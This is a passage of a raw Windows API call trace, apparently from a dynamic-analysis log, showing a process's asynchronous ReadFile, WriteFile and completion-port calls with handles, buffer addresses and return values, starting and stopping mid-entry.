GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.738] WriteFile (in: hFile=0x368, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2f30020) returned 1 [0148.739] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.739] CloseHandle (hObject=0x368) returned 1 [0148.741] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0148.742] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.972] ReadFile (in: hFile=0x66c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x41f0020) returned 1 [0148.972] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.972] ReadFile (in: hFile=0x368, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4670020) returned 1 [0148.973] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.973] ReadFile (in: hFile=0x630, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4790020) returned 1 [0148.973] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.973] ReadFile (in: hFile=0x1a8, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x48b0020) returned 1 [0148.974] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.974] ReadFile (in: hFile=0x638, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x49d0020) returned 1 [0148.974] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.974] WriteFile (in: hFile=0x66c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020) returned 1 [0148.974] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.975] WriteFile (in: hFile=0x368, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x175f0, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020) returned 1 [0148.975] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.975] WriteFile (in: hFile=0x630, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0xe8cf, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4790020) returned 1 [0148.976] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.976] WriteFile (in: hFile=0x1a8, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x104bb, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020) returned 1 [0148.976] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.976] WriteFile (in: hFile=0x638, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x139a6, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020) returned 1 [0148.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.977] ReadFile (in: hFile=0x66c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0148.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.977] ReadFile (in: hFile=0x368, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4670020) returned 0x0 [0148.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.977] ReadFile (in: hFile=0x630, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4790020) returned 0x0 [0148.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.977] ReadFile (in: hFile=0x1a8, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0148.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.977] ReadFile (in: hFile=0x638, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0148.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.978] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.978] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.978] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.978] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0148.978] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.978] WriteFile (in: hFile=0x66c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.978] WriteFile (in: hFile=0x368, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020) returned 1 [0148.978] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.978] WriteFile (in: hFile=0x630, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4790020) returned 1 [0148.988] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.988] WriteFile (in: hFile=0x1a8, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x48b0020) returned 1 [0148.988] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.988] WriteFile (in: hFile=0x638, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x49d0020) returned 1 [0148.988] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0148.988] CloseHandle (hObject=0x66c) returned 1 [0148.989] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0148.991] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0149.033] CloseHandle (hObject=0x630) returned 1 [0149.061] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0149.061] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0150.812] ReadFile (in: hFile=0x368, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0150.812] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0150.821] ReadFile (in: hFile=0x65c, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0150.821] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0150.824] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0150.824] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0150.824] CloseHandle (hObject=0x368) returned 1 [0150.850] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0150.850] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0155.514] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0155.514] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0155.515] ReadFile (in: hFile=0x674, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4280020) returned 0x0 [0155.515] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0155.515] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0155.515] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0155.515] WriteFile (in: hFile=0x674, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4280020) returned 1 [0155.521] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0155.521] CloseHandle (hObject=0x670) returned 1 [0155.527] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0155.528] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.006] ReadFile (in: hFile=0x1a8, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2880020) returned 0x0 [0156.006] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.028] WriteFile (in: hFile=0x618, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0x18c6d, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4940020) returned 1 [0156.034] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.036] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.036] ReadFile (in: hFile=0x670, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4280020) returned 0x0 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.036] ReadFile (in: hFile=0x134, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4700020) returned 0x0 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0156.036] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.036] ReadFile (in: hFile=0x610, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4820020) returned 0x0 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.036] ReadFile (in: hFile=0x618, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4940020) returned 0x0 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.036] ReadFile (in: hFile=0x2e0, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0156.036] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0156.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2880020) returned 1 [0156.042] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, 